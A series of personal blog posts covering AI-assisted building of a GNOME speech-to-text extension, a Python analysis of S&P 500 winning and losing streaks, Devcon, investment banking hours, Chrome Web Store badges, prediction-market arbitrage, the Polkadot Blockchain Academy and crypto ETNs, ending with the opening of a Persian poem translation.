Alright! That makes sense. I know enough JavaScript to get started, so off we go. After some back and forth with ChatGPT regarding the best option to use for the speech-to-text functionality, I decided to use openai-whisper. I gave it a try on my machine using English and Spanish, and it seemed to work well and was fast enough.

At this point I moved to Cursor, which has become my primary coding environment. I rely mostly on Claude Sonnet 4, and find the "thinking" version to mostly be better at complex tasks than the regular version. I gave it the folder structure it needed for the GNOME extension, and it did a reasonable job of writing the python extension code to interface with the Whisper API.

It also did a first pass at the JavaScript code to handle the UI and interaction with the GNOME shell, but that was not quite right. I have noticed that AI tends to struggle with versioning and compatibility issues, and despite telling it I was using GNOME Shell 46, it was using a mix of GNOME Shell 44 and 45 APIs. After some digging around in the GNOME Shell 46 documentation, I was able to correct the issues and get the extension working.

Initially, Claude went off the deep end using PyAudio for audio recording, which was not necessary since I could just use FFmpeg, which I'm more familiar with and openai-whisper relies on. I tried the python script on a few audio files in English and Spanish, and it worked quite well.

The GNOME extension itself is fairly simple. It adds a microphone icon to the top panel, which you can click to start recording. I wanted to also add a keyboard shortcut I could use to toggle recording. This is where I ran into the most significant issues with vibe coding.

I was entirely unfamiliar with the GSetting interface for GNOME extensions, and it took me a while to figure out how to get it working. I had to feed the GSettings schema to Claude manually, one bit at a time, until it understood how to set up the preferences dialog. Then came the modal popup for the recording, which I also had to tweak a bit to get it working correctly with the GNOME Shell 46 APIs.

I spent a few hours on a bug where if the user triggered the recording modal via clicking on the top panel icon, it would not close if the user used the keyboard shortcut to stop the recording, which was super weird. They were using the exact same code. Finally, I realized the issue was the focus being left on the top bar even though the modal was open. I pointed this out to Claude, and after a few trials I figured it was not able to restore the focus, so I wrote a decent amount of code to handle that manually.

Most other issues Claude was able to nail down quickly if I just pointed out the issue. To list a few: redirecting output of the python script to the system journal so I could see the output in journalctl, handling keyboard events while the modals were open (after the focus issue was resolved), and almost all styling issues with the modal popups.

Within a weekend I had the extension working well enough. I was also using it while developing it, which gave me a lot of insight into the user experience and was gratifying to see it work in real-time.

Honestly, the vibe learning part was the best. I had to look up minimal documentation to get started and get at least the scaffolding in place. The vibe coding part was also smooth, but when I did hit roadblocks, AI was completely going off the rails or into a circular reasoning loop. This persisted no matter what model I was using, so especially when it came to fixing the focus + keyboard capture issue, I had to really get involved and fix the issue myself.

Refactoring the code was also a breeze. I was able to get Claude to help me clean up the code and make it more modular and maintainable. I didn't even bother reading anything that was purely refactoring or styling. It just worked! Which is great, because dealing with styling issues is probably my least favorite part of coding.

Now, the shell scripts to install the extensions were an absolute crutch with Claude. I haven't written many shell scripts in the past, let alone one like this that installs the extension. I can certainly read it and adjust as needed, but I confidently think that Claude did a much better job than I could've done.

I think the best part of vibe coding is the feeling that you're not entirely on your own in the process. I've found that in the past 2 years I have become much more open to exploring unfamiliar technologies and programming languages. When GitHub Copilot was first released, I used it extensively to learn Rust in a matter of weeks.

Now I was able to vibe learn and vibe code a GNOME extension in a weekend, which I figure pre-AI would have taken me at least a week and a lot more frustration. It was a pretty magical moment to get an icon in the top panel on the first shot, so I had a visual cue that the extension was on its way.

Vibe coding definitely comes with a few serious issues. As mentioned before, versioning is a huge issue and I had to feed it specific version guidelines to get it right for GNOME Shell 46. On some issues, particularly when it came to fixing errors, when it got stuck it would just keep repeating the same things repeatedly, and I had to manually point it in the right direction.

Lastly, when I asked for some simple modularization of the code to break it into smaller chunks, it completely went off the rails and not only delivered a broken solution, but also added some really weird code such as a deepCopy() function that was literally just copying objects of strings. I had to manually rollback and fix all of that while explaining to Claude why it was wrong. What's more interesting is that even though in the prompt I had told it to "simply refactor and modularize the code" and "do not change any functionality," it still went off the rails and made breaking changes and was confident about it too!

Honestly, I'm blown away by how much I was able to accomplish in such a short time. I had never written a GNOME extension before, and I was able to get something working within a weekend. I learned a lot about GNOME Shell and its extensions, and had to look up minimal documentation to get going.

I think the key takeaway is that vibe learning and vibe coding can be a powerful combination. I've submitted the extension to https://extensions.gnome.org/ but it is still under review. In the meantime, I've installed it on two other machines and the installation script seems to be working well.

The extension is available on GitHub and you can install it using the provided setup instructions.

If you have any suggestions or feedback, please feel free to reach out. I wrote the majority of this article just by talking to my computer and not typing, which kinda feels magical being able to just talk and not type anything...!

We know that market returns are hardly i.i.d. Still, after the market turmoil following "Liberation Day" the markets finally started to recover and starting on 2025-04-17 the SPX went on a 9-day winning streak. Let's see how rare this has been historically.

I ran a simple using the historical SPX data from 1928 to date to count the number of consecutive up and down days. One important model choice is to make sure we don't count overlapping streaks, e.g. a 4-day streak counts only as a 4-day streak, and not toward 2 or 3-day streaks.

• The market unsurprisingly shows a slight upward bias, with 52.4% of days being positive
• This translates to approximately 5.24 up days for every 4.76 down days

• The longest observed up streak was 14 consecutive days (1971-04-15).
• The longest observed down streak was 12 consecutive days (1966-05-09).
• Interestingly both streaks occurred a decade known for its high volatility and wacky monetary policy.

Here's the complete breakdown of consecutive days in the S&P 500:

The analysis reveals that while the market can maintain momentum in either direction, there's a natural limit to how long these streaks can persist. This is not surprising, as we know that equity markets show both volatility clustering and mean-reversion around trend. It is also worth nothing that conditional probability of continuing the streak one more day is basically the same as the unconditional probability of the market going up or down.

SPX Historical Returns since 1928 (courtesy of Yahoo Finance) can be found here.

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

# Read the data
df = pd.read_csv('SPX_historical_data.csv')

# Calculate daily returns and direction
df['Return'] = df['Close'].pct_change()
df['Direction'] = np.where(df['Return'] > 0, 1, -1)  # 1 for up, -1 for down

# Calculate consecutive days
df['Consecutive_Days'] = df['Direction']  # Initialize with direction (1 or -1)
for i in range(1, len(df)):
    if df.loc[i, 'Direction'] == df.loc[i-1, 'Direction']:
        # If same direction, increment/decrement based on direction
        df.loc[i, 'Consecutive_Days'] = df.loc[i-1, 'Consecutive_Days'] + df.loc[i, 'Direction']
    else:
        # If direction changes, reset to new direction
        df.loc[i, 'Consecutive_Days'] = df.loc[i, 'Direction']

# Calculate unconditional probabilities
total_days = len(df)
up_days = (df['Direction'] == 1).sum()
down_days = (df['Direction'] == -1).sum()
p_up = up_days / total_days
p_down = down_days / total_days

# Find maximum observed consecutive days
max_up_streak = df[df['Direction'] == 1]['Consecutive_Days'].max()
max_down_streak = abs(df[df['Direction'] == -1]['Consecutive_Days'].min())
max_consecutive = max(max_up_streak, max_down_streak)

print(f"\nUnconditional Probabilities:")
print(f"Probability of Up Day: {p_up:.4f}")
print(f"Probability of Down Day: {p_down:.4f}")
print(f"\nMaximum Observed Streaks:")
print(f"Longest Up Streak: {max_up_streak} days")
print(f"Longest Down Streak: {max_down_streak} days")

# Function to find maximal streaks
def find_maximal_streaks(series, direction):
    streaks = []
    current_streak = 1

    for i in range(1, len(series)):
        if series.iloc[i] == direction and series.iloc[i-1] == direction:
            current_streak += 1
        else:
            if current_streak > 1:
                streaks.append(current_streak)
            current_streak = 1

    if current_streak > 1:
        streaks.append(current_streak)

    return streaks

# Get all maximal streaks
up_streaks = find_maximal_streaks(df['Direction'], 1)
down_streaks = find_maximal_streaks(df['Direction'], -1)

# Analyze patterns for different lengths
results = []

for n in range(2, max_consecutive + 1):
    # Count streaks of exactly length n
    up_count = up_streaks.count(n)
    down_count = down_streaks.count(n)

    results.append({
        'n': n,
        'up_count': up_count,
        'down_count': down_count
    })

# Print results
print("\nConsecutive Days Analysis:")
print("=" * 50)
print(f"{'Length':^6} | {'Up Days':^10} | {'Down Days':^10}")
print("-" * 50)

for r in results:
    print(f"{r['n']:^6} | {r['up_count']:^10.0f} | {r['down_count']:^10.0f}")

# Create visualization
plt.figure(figsize=(12, 6))
n_values = [r['n'] for r in results]
up_actual = [r['up_count'] for r in results]
down_actual = [r['down_count'] for r in results]

plt.plot(n_values, up_actual, 'b-', label='Up Days', linewidth=2)
plt.plot(n_values, down_actual, 'r-', label='Down Days', linewidth=2)

plt.xlabel('Number of Consecutive Days')
plt.ylabel('Count')
plt.title('Historical Occurrences of Consecutive Days')
plt.legend()
plt.grid(True)
plt.savefig('consecutive_days_analysis.png')
plt.close()

This past month I attended my first Devcon ever as a volunteer. I chose the volunteer path because I wanted active involvement in the community and meeting like-minded people, particularly now that I am spending more time in East Asia. I have attended several crypto conferences by now and generally find them to be less about learning and more about networking, product launches, sales booths, and parties.

Devcon is a conference geared toward developer and researchers. It was an incredibly well-organized event with several tracks and workshops with varying levels of difficulty. I attended as many as I could, but even then, the real value of going to a conference is not attending the talks but meeting people in person. After all, the talks are recorded and freely available on the Ethereum Foundation's Youtube page. At the end of this page, I've linked some of my favorite talks that are certainly worth watching. The calibre of speakers and the depth of the content is unlike anything I had seen before. It certainly lived up to the reputation.

It is also worth noting that Devcon specifically prohibits distribution of swag, sale booths, and other commercial activities you would find at a general-purpose conference. The focus is on the content and the community, not generating revenue from sales booths. This format works exceptionally well and I hope it stays that way.

Instead you have workshops and a lot of Community Hubs which were incredibly informative and hands-on. The Home Operators Hub also had a good number of people from ethstaker community which is one of my favorite communities in the Ethereum space. It was great to meet so many of the people who I admire and without them my solo staking journey would've been far less smooth.

It is worth noting that there are several events starting a year before Devcon actually takes place called Road to Devcon and I attended a couple of them when I had the chance in Bangkok earlier this year organized by ETHPadThai. I love that name btw!

tldr; whatever is needed! I was assigned as a stage volunteers, and my main task was making sure the speakers made it on-time to the designated stage and the talks went smoothly. I also helped in with some of the wellness activities so other volunteers could take a break when short-staffed. It never felt like a chore, and I thoroughly enjoyed all the volunteers that I was with.

I have volunteered a couple of times at PyCons and really enjoyed the experience. Devcon was a whole different level and I cannot wait for next year's Devconnect.

Especial shoutout to the organizers and the volunteer leads (Shyam and Morgane you two are my MVPs!) who somehow managed ~13k attendees and a 300ish army of volunteers. The amount of planning and coordination that goes into an event of this scale is mind-boggling, yet they pulled it off and made it look easy too!

If you have ever attended a crypto conference, you would know that side events are kind of the main event. It's a bit of a weird dynamic because you have multiple side events happening and some times the main events ends up fairly empty. Devcon makes an active effort to limit side events, even then there was something like +900 side events jammed in a week of activity. Given the huge attendance of Devcon (this year was just shy of 13k people) other conferences get organized just before and after. Right before Devon there was the DeFi Security Summit and the first week you had several overlapping one-day conferences like the DuneCon, Ethereum Cypherpunk Congress, GeckoCon, you get the point.

One particular event that I really enjoyed and would highly recommend was the Bankless Summit organized right after Devcon which featured TED-style talks. I highly recommend you check them out as the videos get uploaded here.

Goes without saying there were plenty of rooftop drinks, social dinners, parties, etc. to your heart's content. I went out every day after the conference and met a plethora of super interesting and driven people from all over the world. One particular group I really enjoyed were a 30ish community of eth developers from Iran, which I had no idea about beforehand. It's amazing to see how the decentralized nature of Ethereum permeates the intense internet censorship in Iran.

From all the parties I went to, rAAVE has a special place in my heart. The venue, the music, the crowd, the atmosphere. Hard to live up to the hype and exceed it!

It's hard to overstate how amazing the vibes were at Devcon. Social media gets a good chunk of its involvement from flaming and trolling, but in person, it's a whole different story. The energy was palpable and the enthusiasm was infectious.

Coincidentally, during Devcon crypto markets started nearing all-time highs. Bitcoin certainly put on a show. You would notice people stood a little taller, walked a little straighter, and smiled a little wider. Oh, the irony of being at a crypto conference where the main asset of importance to the audience still hasn't reached its previous all-time high ;)

But seriously, 13k people from all over the world at a conference aimed at developers. It is as real of a signal as you would need to be bullish Ethereum.

The ticker is ETH.

I didn't get to attend every talk and am still working through some that I had marked and couldn't attend. That said, here are some of the must-watch talks in my opinion in no particular order.

• Ethereum in 30 Minutes by Vitalik Buterin
• This year in Ethereum by Josh Stark
• The REAL state of L2s by Bartek Kiepuszewski
• Beamchain by Justin Drake, and then watch You’re Not Bullish Enough! Ethereum Roadmap & Beamchain
• Can we fix MEV? by Jonah Burian
• Lessons learned from Tor by Roger Dingledine
• Web3 Security is Embarrasing by Andrew MacPherson
• How to Properly Open Source Software: Lessons Learned from the Linux Foundation by Hart Montgomery

Reminder: All talks are available on the Ethereum Foundation's YouTube page.

In the first episode of HBO's excellent show, "Industry", we are introduced to a group of young graduates ready to start their careers in an investment bank. One of the new hires, Hari, pulls an all-nighter fueled by energy drinks and pills and dies from a heart attack in the bathroom.

Had I not worked at a couple investment banks before, I would've written that off as a dramatic exaggeration. It is not. Here is one anecdote from roughly the same time I was working in investment banking: "Bank of America intern died from epileptic seizure in shower, inquest told". It is hardly an isolated incident. A quick search will reveal many more, but I leave that up to you.

When I started my career in finance as an investment banking intern in 2008, I knew that that hours were going to be long. Banking is a well-paid overpaid industry with a cutthroat reputation where you are expected to strictly respect the hierarchy, work long hours, have meticulous attention to detail, and work under near-constant pressure (i.e. superiors yelling at you). The average investment banking analyst works 80-100 hours a week, with one or two all-nighters a week. It is not uncommon to hear people missing loved ones birthdays, anniversaries, etc. I started working the next day I graduated, missed my university's convocation, worked every single Christmas and New Year's Eve, and took a maximum of two weeks off a year.

The banking industry will tell you that the long hours are because the work is complex and the clients demands it. That the pace of finance is fast and the industry is competitive with around-the-clock markets. While that is partially true, is grossly exaggerated and mostly bullshit to feed the junior ranks.

You are expected to be on call at all times, and you are expected to make it to the office under an hour almost no matter what hour of the day it is. Getting an email at 2am while in the club and dashing to the office half drunk to fix a model would barely strike any investment banker as unusual. People routinely get called during their weeks off even if overseas.

So let's talk about the "What", the "Why", and the "How" of investment banking hours.

Investment bankers are the middlemen between companies and investors. Think of them as real estate agents for corporations. Past the avalanche of jargon they throw at you, they broadly do two things:

1. Capital Raising — They raise funds for companies by issuing debt or equity. Think obtaining a mortgage for buying a house. Simple as that.

2. Advisory Services — They provide advice to companies on mergers and acquisitions, restructuring, etc. Think your real estate agent sending you listings that match your criteria including some metrics such as price per square foot.

The lion's share of the work is menial, repetitive, and extremely uncomplicated requiring no more than high school level math. Ignoring the "quants" in an investment bank, the actual math required for investment banking is laughably simple, and you almost never go beyond basic arithmetics. Most of the work is done in Excel, and knowing your way around Excel + PowerPoint is far more important that knowing how to price a derivative. I assure you almost not a single person in investment banking (I am not talking about trading) can even tell you what a Black-Scholes model is. You'll spend far more time fixing fonts and colors in your pitchbook than you will ever spend on a complicated financial model. Even then, the models are fairly standardized, and you won't be estimating market risk premium using advanced statistical models. You'll probably just plop it down from a third-party database.

Roughly in the order of importance, there are four reasons:

1. Lack of differentiation - Remember the work is not complicated? That means that one of the main ways to outcompete your peers is to work more hours than them.

2. Fixed Costs vs. Variable Revenue - Generally speaking, Analysts and Associates are paid a fixed amount with a range that is fairly standardized across the industry. The Directors and Managing Directors however, are usually paid a bonus ranging massively depending on the revenue they bring in. This creates a conflict of interest where the senior bankers want to "pitch" (jargon for "sell") as many potential deals as possible, and the junior bankers are the ones who have to do the grunt work and make the pitchbooks. Senior bankers see the junior bankers as disposable work horses that will help them land deals to stuff their pockets.

   The compensation even at junior ranks consists of a base salary and a bonus. The bonus is completely discretionary and accounts for the majority of the total compensation package . You do not have to work 90 hours a week. They also do not have to pay you a bonus at all.

   The only juniors who are exempted from this are the ones who have an "in" with the senior bankers. The only analyst who used to go home at 6pm every day and got top bonus, well, let's say the head of investment banking had a picture playing golf with their dad on his desk.

3. Culture - The culture in investment banking is one of the most toxic in the world. I have seen and heard my fair share of hazing having always been an active member of fraternity life and sport teams. Nothing comes close to what I witnessed in my investment banking years as an analyst. The seniors treat you like a literal slave. My MD once threw a stapler at another analyst who couldn't hear him because he had his headphones in. An MD called me to complain that I should've listed him before another MD on the "to" line of an internal email because he was more senior. I was frequently told to "not blow anything up" in various references to my Middle Eastern ethnicity. Homophobic and sexist comments are expected.

   Because they got treated like garbage to get to where they are, they for sure want to make sure you earn your "rite of passage". This is why even if juniors don't have any work left to do they will not leave and put in "facetime". Leave earlier than others a couple of times, and the staffers will make sure your workload increases. There is no room for efficiency. You have every incentive to drag out your work as long as possible so at least you can go to sleep and have one day of the weekend off.

4. Client Demands - This is the only legitimate reason for the long hours and notice that it is actually last on this list. If you are staffed a live deal, then absolutely there are times when all-nighters are warranted. In a bidding war in a hostile takeover you absolutely need to adapt a wartime mentality and be ready to work around the clock.

   That said, the vast majority of the time you will be working past midnight on a pitchbook that might never be opened in a client meeting. Once I had a colleague who had to come in over the weekend to send our VP his "Harry Potter" book. He didn't have to do it, but as I said above, they also didn't have to pay him a bonus.

💰 Money 💰

Anybody who tells you otherwise is lying.

The funniest part of investment banking interviews is that when they ask you why you want to work in investment banking, you literally answer any bullshit you have cooked up other than "money"! You have an entire industry concerned with valuation, buying and selling, making money, taking fees, but the only thing you will never hear out of a banker's mouth is that they're in it for the money.

Let me elaborate on other terms you might hear that effectively translate to "money":

1. "Exposure" - You will hear this a lot. "I advise CEOs and CFOs". Sure you do. I'm sure the advice of a freshly graduated 22-year-old banker or consultant in a pinstripe suit is invaluable to a CEO who is giving the bank an advisory role which happens to also extend them a couple billion dollars in credit facilities.

2. "Learning" - You certainly will learn a lot. I learned how a bank works with its many divisions and pivotal role in a capitalistic economy. I also stopped learning around the one-year mark because the rest was just more of the same. However, I cannot name too many jobs where a 22-year-old, short of professional sports, could make 150k USD a year in an entry-level job.

3. "Prestige" - I used to think I was hot shit because I had landed a super competitive job. Outside professional services and the type of people you probably don't want to be surrounded with, no one really cares that you are an investment banker. I would take an honest farmer over a thousand conniving bankers any day of the week.

Industry is a fantastic show if you want to understand the prevalent culture at investment banks. The first season is simply incredible.

Remember this, banking at junior ranks has a turnover that is well over 90%. If it were such a great place to work, why would people quit so often?

I learned the hard way that despite the image portrayed, I was, in fact, not surrounded by the best and the brightest. A high GPA is absolutely necessary to break into banking without some sort of "in", but make no mistake. A high GPA indicates far more that you can follow instructions and are willing to perform what is needed to get the grade. It does not indicate above average intelligence. In my three years as an analyst, I never met a senior banker who I would consider above average intelligent. The smart juniors find plenty of better and more fulfilling opportunities elsewhere.

Now despite all the shade I threw at an investment banking above, I wouldn't discourage anyone from trying it out. I think I would do it again, although for at least one year less and wouldn't have taken it so seriously. I was hungry to pay off my student loans, and achieve a nest egg I could fall back on. I did that, and I am grateful for the experience. I met some of the best friends I have in my life, and I learned a lot about myself. Every single analyst and associate I was with moved on to better things, and we still keep in touch. I wouldn't have met them otherwise. And I certainly wouldn't have been able to use banking as a stepping stone to where I am now.

When browsing through the Chrome Web Store, you’ve likely come across extensions marked with "Featured" badges. At first glance, these badges seem to suggest that Google has curated these extensions, much like how some app stores might feature top-quality apps after editorial evaluation.

This is how the Chrome Web Store defines that tag:

Featured extensions follow our technical best practices and meet a high standard of user experience and design. Before it receives a Featured badge, the Chrome Web Store team must review each extension. The team checks for adherence to CWS best practices, an intuitive user experience, and use of the latest platform APIs, among other things.

When I see the word "Featured", to me it implies some form of promotion or curation. I wasn't expecting to see mere technical compliance with Google's policies. I think "Verified", "Reviewed", or even "Compliant" are better words and convey the intention more clearly. After all, I have 3 extensions of my own which between them have less than 30 users by now.

Hacker News - Saved You a Click. A simple extension for HN to open the linked page and the comments page together in new tabs since I found myself clicking both all the time.

New Tab URL . Customizes new tabs from the default Google search page to a custom URL.

One-Click Image Saver. Saves images with a single customizable mouse + keyboard shortcut.

They all have Featured badges and hardly any real users. I wrote them since to me they're useful and I wanted to learn how to write browser extensions. Looking through the existing extensions for saving images faster, I found most of the popular ones to be bloated with code I didn't understand. So I wrote my own.

Seriously though, this is the code for the top image saving extension on Chrome. Well over +2,000 lines of code and I have no idea why.

I have found the Chrome store to be full of suspicious extensions. More worryingly, since I published these extensions I've received all sorts of email from people trying to get me to pay them to "promote" the extension, all the way to people asking me to sell the extension to them. Many of the extensions I reviewed run remote code which I find highly suspect.

Remember that you can always see the source code for any extension.

Stay safe out there!

No, you do not have to know who will win.

At the time of writing this article, Polymarket has odds of Harris winning the election at ~47%.

Now head over to PredictIt and Harris is leading by 55%. Interestingly, the chance of Harris NOT becoming president is trading at 46%.

So Harris winning or not winning election is sitting roughly at a combined ~93%. Factoring transaction costs, that's 6-7% spread waiting for you to be picked up.

Buy "No" on Harris on PredictIt at 46c and buy "Yes" on Harris on Polymarket at 47.4c, and you'll have a 6.6c lock on your money invested. That's a cool 7% return betting on a (almost) sure thing.

6-7% between now and January 20th is 18-45% annualized depending on when the market resolves. If the election is called a few days after Tuesday, November 5th, then your annualized return would be closer to 35%. If it gets dragged out all the way to inauguration day on January 20th, then annualized return drops to 20%. Read the footnotes of both contracts to understand how they will resolve.

I can think of a few reasons.

Limits to Arbitrage - Polymarket is blockchain based so it is in theory accessible worldwide. PredictIt is New-Zealand based with fiat money and has many geographical restrictions and not even available in my home country of Canada.

Investment Limit - PredicitIt limits investment contracts per individual to $850 a contract. That's so little money, especially compared to the friction of funding an account that it's not worth the time for most people to arbitrage. Making several accounts is also not worth the hassle.

It is safe to assume that the audience of PredictIt is a regional subset of Polymarket and there is a lot more friction to use it. It clearly shows in the wider spreads and less liquidity.

Almost. There's never any free money. But in this case, almost.

In 2021, I traded in size an even more outrageous mispricing on Polymarket contracts for Inauguration day. In this case unfortunately you will have counterparty risk on two platforms, which is definitely something to consider. Crypto is risky, and you run several risks inherent to DeFi which you should be aware of. PredictIt is a regulated entity subject to the wrath of regulators and last major market similar to it, InTrade, went up in flames.

Election prediction markets are wild. Last time I bet substantial amounts was on Harris winning the candidacy at 90c, a full day after WSJ had reported that Harris' nomination was basically a done deal. That contract traded all the way to August 21st until it was official during the Democratic National Convention, a full 3-weeks after the outcome was effectively sealed.

This is not investment advice. All opinions are my own, and you should do your own due diligence, as always.

Two days ago, I graduated from the 5th cohort of the Polkadot Blockchain Academy (PBA). As I sit in the Singapore airport lounge waiting for my flight, I thought to use this time to reflect on the past five intense weeks at the academy. The days were long, the material was challenging, and sleep was in short supply. And I would do it all over again.

The best part, as it always is, is the company you are with. My fellow students, from every continent on the planet, made the long grind of the academy an amazing journey. The instructors were top-notch practitioners. The operations team, led by the ever-smiling Erin, made sure everything ran smoothly. After a decade out of school, it was fantastic to be back in a classroom setting. Goodbye felt only like a "see you later".

The vast majority of people attending the academy were developers, some already working in web3, some already working in the Polkadot ecosystem. I was somewhat the odd one out, a quantitative finance guy who wanted to primarily wanted to understand the technology better. My job as a researcher in the crypto space means I had spent quite a bit of time understanding the Polkadot ecosystem and the role of DOT in it. I have thought for some time now about entrepreneurial pursuits in the web3 space, and learning Polkadot from the people who built it from the ground up seemed like a no-brainer. In ranks consistently as one of the top developer ecosystems in the crypto space.

It also appears fairly consistently in the top 10 holdings of crypto hedge funds over the years, generally the largest allocation after Bitcoin and Ethereum.

I first found out about the academy while doing research on Polkadot and Kusama in January. I applied in February and received an entrance exam invitation.

The PBA qualifier exam in itself is worth taking even if you solely are just a Rust enthusiast 🦀! In the words of the academy itself:

This exam is maintained by the Polkadot Blockchain Academy, for the benefit of the entire Rust community. The Academy accepts individuals modestly skilled in Rust, and maintains this exam to help everyone assess their proficiency being of a level we would consider for the program.

I learned coding first in C++ and then mostly in Python/MATLAB working as a quant. I had no previous experience in Rust before receiving this exam. Rust has been ranked as the most loved programming language by developers for the past six years or so. Particularly in the blockchain space it is gaining rapidly over Golang. I thought it would be an excellent opportunity to see what all the hype is about. After all, once you know C++, any other language should merely be a matter of learning syntax.

I had ten days to complete the exam. I spent 8 days learning from the superb resources at The Rust Programming Language, and two days completing the exam. It was quite a jammed ten days but man was it worth it! I think Rust is a fantastic language, and I look forward to using it in my daily work.

I would say that Rust makes a terrible first language to learn programming, but an excellent second one! In my opinion, you can only understand and appreciate rust concepts such as lifetime and borrowing if you have seen the problems they solve in other languages, in my case C++. If you are a beginner or coming from a super high level language like JS, I think learning rust would be a fairly bumpy ride.

After submitting the exam, I had a video interview with one of the PBA staff. A few weeks later I received my acceptance letter to start the academy in May hosted on the National University of Singapore campus.

What I appreciate the most about the entrance exam is that it is not a bunch of leetcode. It is a thoughtful and thorough exam that tests your understanding of the language and emphasises the parts that would be the most relevant to the academy. If you have ever done a developer / quant interview, you know what grinding leetcode / brain teasers is like. In my view, they are also a poor indicator of your ability to succeed on the job, merely your ability to have grinded enough beforehand to know how to solve the specific problem.

The academy itself is an intense, no BS, five weeks program. It covers seven modules:

1- Cryptography
2- Economics and Game Theory
3- Core Blockchain Concepts
4- Governance
5- Smart Contracts
6- Polkadot-SDK: FRAME, Pallets, and XCM
7- Polkadot: Cumulus, Parachains, etc.

Before the academy started, we had an introductory call and some pre-reading material to get us up to speed. In the famous words of Nikos, the key to success in the academy is "Rest & Rust"! If you want a flavour of what the academy coursework is like, I highly recommend you check out Dot Code School as well my favorite blockchain learning activity: Blockchain From Scratch.

The instructors are all blockchain experts, with the majority coming from Parity Technologies or the Web3 Foundation. There are assignments / activities / quizzes every week which will require your complete and undivided attention. You have ~8 hour of lectures every day (sometimes Saturdays too) with coursework to complete pretty much right after. At times it felt like drinking water from a fire hose, but the camaraderie of the group made us push through. There are also office hours every day where the instructors are available to help you with any questions you might have. To my surprise, not only were the instructors approachable and helpful, they also went our of their way frequently to burn the midnight oil well into the night both in person and on Discord with us.

The emphasis throughout the academy is on learning by doing. Economy module? You will be playing a variety of game theory games with your classmates with real money on the line. Blockchain module? You will be building a blockchain from scratch with live-coding during class. For the assignment we built a comprehensive UTXO wallet that had to mimic the functionality of a real-life wallet that deals with chain reorgs and double spends. Governance module? You will be participating in a mock council meeting. Smart Contracts? Here is a node running with some vulnerabilities, now go drain the funds. You get the idea. The final assignment was building a pallet for the Polkadot runtime using FRAME for an option of your choosing, all which are real-life applications and not some highly stylized unrealistic case.

The PBA is funded by the Polkadot Treasury. There is no cost to attend the PBA other than arranging for your own travel. The academy provided student accommodation in the dormitories and food vouchers to spend on campus. I think it is a fantastic initiative that removes the economic barrier and makes the program accessible to people from all geographic and economic backgrounds.

Lastly, in case you are worrying that this is some sort of indoctrination camp for Polkadot, it is not. It is run by Polkadot but the emphasis is on learning the technology and the blockchain ecosystem in general. You don't even talk about Polkadot until the last week of the academy! There are certainly opinionated views on the concepts and what the best approach would be, but that is to be expected in any educational setting.

Arguably the best part for me. You are surrounded by people passionate about the blockchain tech and web3 in general. It truly was a diverse group of people as young as 19 all way into their 40s. We had about 90 people attending in person, and another 50 attending remotely. You didn't really have to know much about blockchain to attend. It certainly helped, but it was not a requirement. The academy is designed to be accessible to people from all backgrounds. The only thing you needed was a passion for learning about web3 and having learned enough Rust to not get stuck during the academy.

There were also quite a few opportunities to have fun with the group. We had a few social events, a beach day, tons of time eating together, and my favorite part on the last day for a meme competition!

The last day of the Academy we had Gavin Wood walk us through the Gray Paper. Finally, graduation ceremony was held at the National Gallery of Singapore followed by a party where Gavin DJed for us. It was a fantastic way to end the academy! Waking up hungover the next day, it wasn't the easiest of goodbyes after spending five weeks with the same people every day with a singular focus on learning!

There were quite a few digital nomads in the crew who were planning to travel around Asia after the academy. I look forward to reconnecting with the people who made the academy so much richer than the sum of its parts for me.

I, along others, put my life pretty much on hold for five weeks to attend the academy. There have been a number of sprints in my life professionally or academically where I dedicated so much time and energy to a single goal. The academy certainly ranks amongst the top of those sprints. I am grateful for the opportunity to have attended the academy and a huge shout-out and thank you to all the PBA staff and instructors who made this possible. I am not aware of any other industry-led program that offers such a comprehensive and hands-on approach to learning the blockchain technology. The fact that it is funded by the Polkadot Treasury to make it accessible to all is a true testament to the ethos of the empowerment of the individual in the web3 space.

I am looking forward to applying what I have learned in the academy in my daily work and utilizing the amazing network that was cultivated during our time together. As far as I understand it, the academy will only get bigger with a heavier focus on remote learning to further democratize the access to the program.

Now I will take a few days off to recover from the academy and then get back to work. I have a few ideas that I am exploring in the web3 space, and I am excited to see where they will take me.

Rest & Rust!

• Polkadot Blockchain Academy website
• PBA on YouTube with lecture videos
• PBA on LinkedIn
• PBA on Twitter

After the Bitcoin ETFs in the US, the crypto ETNs in the UK are almost here. They will only available be to professional investors. That's a prudent choice.

Despite the Bitcoin ETFs breaking all sorts of records, including fastest ever to reach $10bn in assets, the ETNs should be approached with extreme caution. The average investor (retail or not) views all Exchange-Traded Products (ETPs) as the same, until they are not.

And believe me they are not.

If you want to read it straight from the regulators, here is the explanation from FINRA and here is the one from SEC.

Here is the part that you should pay attention to:

Some ETPs are more similar to mutual funds than others. ETFs, like mutual funds, are pooled investment funds that offer investors an interest in a professionally managed, diversified portfolio of investments. But unlike mutual funds, ETF shares trade like stocks and can be bought or sold throughout the trading day at fluctuating prices. They're also subject to bid-ask spreads, which represent the difference between the highest price a buyer will pay and the lowest price at which a seller will sell shares of a stock at any given time.

On the other hand, while ETNs also trade like stocks, they're more similar to corporate bonds in that they're debt issued by a financial institution and subject to the credit risk of that issuer. Unlike a mutual fund or ETF, an ETN has no underlying portfolio of assets. Unlike a corporate bond (but similar to a structured note), an ETN represents a promise to pay a return at maturity reflecting the performance of some benchmark or index, so repayment at maturity may be greater than or less than par value, or face value. Some ETNs might make periodic distributions, but others don't.

If reading the parts I have emphasized above didn't give you pause, they should. The ETNs are nothing but a promise by the issuers, and you are the mercy of their benevolence (i.e. as long as they are making money off of you). The history of ETNs is riddled with colossal blowouts, here is a famous one on volatility, here's another on oil.

Crypto, including Bitcoin, is a volatile asset with historical volatility well in excess of 100% at times. That makes it a fairly poor candidate for ETNs.

Spot crypto in cold storage self-custody should be your first choice. I understand market restrictions and legal limitations make the ETFs a desirable products for many who cannot or do not want to self custody.

The crypto ETNs however, in my opinion, should be avoided all together.

As another Nowruz comes to mark the first day of spring, I decided to translate one more beautiful contemporary Persian poem I couldn't quite find a decent translation for.

Persian poets have had a long storied tradition of blending each other's work into their own, such as by providing an alternate viewpoint about the same story or continuing it. The poem below is written by Fereydoon Moshiri as somewhat of a response to a famous Persian poem called "Address" by Sohrab Sepehri.

It is a beautiful and emotional poem about friendship. Like any translation, let alone one done by an amateur like me, some amount of nuanced meaning is lost in changing the medium. In Persian there are many words to describe your relationship with others ranging from mere acquaintances to best friends. The word "doost" would translate to "friend" in English, but it carries quite a bit more weight. It is a word much closer in meaning to describe your high school bestie who wouldn't think twice having your back in a fight, rather than your casual drinking buddy watching sports together.

